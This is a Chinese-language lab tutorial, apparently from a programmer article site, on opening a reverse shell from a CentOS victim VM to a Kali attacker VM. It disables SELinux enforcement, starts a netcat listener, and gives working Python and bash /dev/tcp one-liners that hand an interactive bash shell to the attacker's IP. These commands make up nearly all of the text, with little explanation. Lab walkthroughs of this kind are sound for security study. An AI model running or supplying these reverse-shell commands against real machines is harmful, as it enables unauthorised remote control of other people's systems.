使用python和bash反弹shell的方法详解
程序员文章站
2022-03-09 22:42:15
...
实验环境:
攻击(攻击者)主机: |
Kali2020.2 虚拟机 |
nat |
192.168.254.132 |
目标(受害者)主机: |
Centos_6.9 虚拟机 |
Nat Vmnet1 |
192.168.254.173 192.168.10.14 |
【步骤一】:保持防火墙开启状态,关闭setenforce,结果如【图1】所示:
【命令】
setenforce 0 //设置SELinux 成为permissive模式 临时关闭selinux的
service iptables status //查看防火墙状态
图1
Python反弹shel l:
【步骤二】:kali使用nc进行对本机的4444端口进行监听,目标主机执行下面python命令:,结果如【图2】所示:
【命令】
//kali使用nc进行对本机的4444端口进行监听:
nc -lvvp 4444
//目标主机执行下面python命令:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.132",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
图2
Bash的方式:
【步骤三】:使用bash的方式反弹shell,结果如【图3】所示:
【命令】
nc -lvvp 4444
bash -i >& /dev/tcp/192.168.254.132/4444 0>&1
图3
上一篇: windows PowerShell内置的端口扫描器使用
下一篇: linux反弹shell的原理